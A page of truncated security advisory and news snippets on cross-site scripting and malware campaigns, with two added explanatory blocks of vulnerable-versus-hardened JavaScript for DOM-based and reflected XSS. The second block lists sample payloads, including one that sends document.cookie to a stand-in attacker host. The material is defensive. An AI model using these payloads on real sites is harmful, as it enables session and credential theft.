DOM Cross-Site Scripting Vulnerability in UFIDA U8+ Financial System
UFIDA U8+ is a financial software suite. A stored cross-site scripting vulnerability exists in the UFIDA U8+ financial system. It allows an attacker to insert malicious JavaScript into a page to obtain user cookies and other information, leading to user hijacking...
Suspicious Credential Harvesting
Compromised websites injected with malicious JavaScript have been identified. Successful exploitation could result in remote code execution on the target system once the malicious page is loaded, leading to credential harvesting...
CVE-2017-3948
Cross-Site Scripting (XSS) in IMG tags in the ePO extension in McAfee Data Loss Prevention Endpoint (DLP Endpoint) 10.0.x allows authenticated users to inject arbitrary web script or HTML by injecting malicious JavaScript into a user's browsing session...
Phone Hack Uses Sensors To Steal PINs
University researchers have created a method to steal a smartphone user's PIN by leveraging sensor data generated by the targeted phone. Researchers say the method has a 74 percent success rate at accurately determining a four-digit PIN entered by the phone's owner. Researchers fr...
WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting
WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting Source: https://sumofpwn.nl/advisory/2016/persistentcrosssitescriptinginthewordpressnewstatpressplugin.html Abstract A persistent Cross-Site Scripting (XSS) vulnerability has been found in the WordPress NewStatPress plugin. By using this...
U.S. Dept Of Defense: Remote File Inclusion, Malicious File Hosting, and Cross-site Scripting (XSS) in ████████
Details: There is currently a security misconfiguration in the plain.php function located on the host http://██████████/, allowing attackers to include webserver contents of their choosing with no restriction on file types and/or IP addresses, as well as to embed malicious JavaScript payloads in the response v...
Spammers using Facebook Messenger to Spread Locky Ransomware
If you come across a Facebook message with an image file in .SVG format sent by any of your Facebook friends, avoid clicking it. An ongoing Facebook spam campaign is spreading a malware downloader among Facebook users by taking advantage of an innocent-looking SVG image file to infect...
WordPress Plugin WassUp Real Time Analytics 1.9 - Persistent Cross-Site Scripting
Source: https://sumofpwn.nl/advisory/2016/persistentcrosssitescriptinginwassuprealtimeanalyticswordpressplugin.html Persistent Cross-Site Scripting in WassUp Real Time Analytics WordPress Plugin Abstract A stored Cross-Site Scripting (XSS) vulnerability has been found in the WassUp Real Time...
XSS Vulnerability in NetEase Email Master Client PC Version
NetEase Mail Master is a general-purpose email client launched by NetEase 163. An XSS vulnerability exists in the PC version Ver2.4.1.8 of the NetEase Mail Master client. It allows attackers to insert malicious JavaScript into the page to obtain user cookies and other information, leading to user...
WordPress Activity Log 2.3.1 Plugin - Persistent Cross-Site Scripting
Exploit for PHP platform in category web applications Persistent Cross-Site Scripting in WordPress Activity Log plugin Han Sahin Abstract A stored Cross-Site Scripting (XSS) vulnerability has been found in the WordPress Activity Log plugin. By using this vulnerability an attacker can inject malicio...
Adobe Analytics AppMeasurement for Flash Library Patch
Adobe today patched a vulnerability in the Adobe Analytics AppMeasurement for Flash library, which can be added to Flash projects to measure the usage of Flash-based content. The vulnerability is a DOM-based cross-site scripting flaw that can be abused for cookie theft, said researcher Randy...
Surge in Spam Campaign Delivering Locky Ransomware Downloaders
FireEye Labs is detecting a significant spike in Locky ransomware downloaders due to a pair of concurrent email spam campaigns impacting users in over 50 countries. Some of the top affected countries are depicted in Figure 1. Figure 1. Affected countries As seen in Figure 2, the steep spike start...
Cross-Site Scripting Vulnerability in Dreammail Email Client
DreamMail is a professional e-mail client for sending, receiving and managing e-mail. A cross-site scripting vulnerability exists in the DreamMail Ver 5.16.1003.1015 email client. It allows an attacker to insert malicious JavaScript into a page to obtain user cookies and other information,...
ESM Console XSS vulnerability
A cross-site scripting vulnerability exists in the web-based console management. This vulnerability has been assigned CVE-2015-2223. This issue affects the management interface of Traps, where an authenticated administrator may be tricked into injecting malicious JavaScript into the web UI...
Trello: DOM based XSS via Wistia embedding
Hi, You are using Wistia to embed video at trello.com. However, the external script from fast.wistia.com is vulnerable to XSS and allows running malicious JavaScript on your side. Vulnerable code: fast.wistia.net/assets/external/E-v1.js I found that the parameter wchannel can be controlled to load js from...
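The pattern the report above describes, a query-string parameter that decides which script a page loads, is the classic DOM-based XSS sink. The following is an added example, not Trello's or Wistia's code: it shows why resolving a raw parameter against a CDN base URL hands the attacker a script of their choosing, and how an identifier allowlist plus an origin re-check closes it. The parameter name `channel` and the host `cdn.example.net` are assumptions for illustration.

```javascript
// Added example, not Trello's or Wistia's code. Models a DOM-based XSS sink
// where a query-string parameter selects a script to load. The parameter name
// "channel" and the CDN host "cdn.example.net" are assumptions.

// Vulnerable: the raw parameter is resolved against the CDN base URL.
// "//evil.example/x" is a protocol-relative URL, so resolution yields an
// attacker-origin script that then runs with the embedding page's privileges;
// "../../admin" escapes the intended path on the legitimate host.
function scriptUrlUnsafe(pageHref) {
  const channel = new URL(pageHref).searchParams.get('channel') || 'default';
  return new URL(channel + '.js', 'https://cdn.example.net/channels/').href;
}

// Hardened: accept only a tight identifier charset, then re-check that the
// resolved URL still lands on the expected origin and path as a second guard.
const CHANNEL_RE = /^[A-Za-z0-9_-]{1,64}$/;

function scriptUrlSafe(pageHref) {
  const channel = new URL(pageHref).searchParams.get('channel') || 'default';
  if (!CHANNEL_RE.test(channel)) return null;
  const u = new URL(channel + '.js', 'https://cdn.example.net/channels/');
  if (u.origin !== 'https://cdn.example.net' || !u.pathname.startsWith('/channels/')) {
    return null;
  }
  return u.href;
}

// Demonstration on constructed page URLs (a normal value, a protocol-relative
// URL and a path-traversal attempt).
for (const href of [
  'https://app.example/board?channel=news',
  'https://app.example/board?channel=//evil.example/x',
  'https://app.example/board?channel=../../admin',
]) {
  console.log(href, '->', scriptUrlUnsafe(href), '|', scriptUrlSafe(href));
}
```

In a real page the returned value would be assigned to `script.src`; the check belongs before that assignment, and a Content-Security-Policy `script-src` that names only the CDN origin is the matching defence in depth for when the allowlist is bypassed.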
Microsoft Edge XSS Filter Bypass (MS15-107: CVE-2015-6058)
An XSS filter bypass vulnerability exists in Microsoft Edge. A remote attacker could exploit this issue by convincing target users to view a web page containing malicious JavaScript code with an affected version of Microsoft Edge. Successful exploitation could allow an attacker to take any action...
Github Mitigates DDoS Attack
Code repository Github mitigated a distributed denial-of-service attack, restoring services this morning around 9 a.m. Eastern time. According to a Github status log, connectivity problems began today around 5:30 a.m. with Github declaring it was under a DDoS attack an hour later. A request for...
Palo Alto PAN-OS XSS Vulnerability (PAN-SA-2015-0003)
A cross-site scripting vulnerability exists in the web-based device management interface whereby data provided by the user is echoed back to the user without sanitization. Ref 73638 SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from referenced sources, and...
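The flaw class in the advisory above, user-supplied data echoed back into HTML without sanitization, is reflected XSS, and the same root cause underlies several of the other entries on this page. The block below is an added example, not Palo Alto Networks code: a minimal renderer that reflects a search term unsafely beside one that escapes it for both text and attribute context, exercised with two constructed payloads. The page layout and the `q` parameter are assumptions.

```javascript
// Added example, not Palo Alto Networks code. Models reflected XSS: a value
// the user supplied is echoed into HTML. Page markup and the "q" parameter are
// assumptions for illustration.

// Minimal HTML escaper for the characters that change parsing in text and in
// double-quoted attribute contexts. It is NOT sufficient for JavaScript, CSS
// or URL contexts, which need their own encoders.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable render: the query value is concatenated straight into the page,
// once in text context and once inside an attribute value.
function renderUnsafe(query) {
  return '<p>No results for: ' + query + '</p>' +
         '<input name="q" value="' + query + '">';
}

// Hardened render: every interpolation is escaped, and the attribute stays
// double-quoted so the &quot; encoding actually keeps the value inside it.
function renderSafe(query) {
  const q = escapeHtml(query);
  return '<p>No results for: ' + q + '</p>' +
         '<input name="q" value="' + q + '">';
}

// Constructed payloads: the first breaks out of text context with a <script>
// element that exfiltrates document.cookie; the second never needs a "<" and
// instead closes the attribute to add an event handler.
const PAYLOADS = [
  '<script>fetch("https://evil.example/?c=" + document.cookie)</script>',
  '" autofocus onfocus="alert(document.cookie)',
];

for (const p of PAYLOADS) {
  console.log('UNSAFE:', renderUnsafe(p));
  console.log('SAFE:  ', renderSafe(p));
}
```

The second payload is the one that matters for review: an escaper that only handles `<` and `>` would still let it through, and an unquoted attribute (`value=` with no quotes) is breakable by a bare space even after full escaping. Cookie theft as the impact, which most entries on this page cite, is blunted but not removed by the `HttpOnly` cookie flag, since the injected script can still act on the user's behalf inside the page.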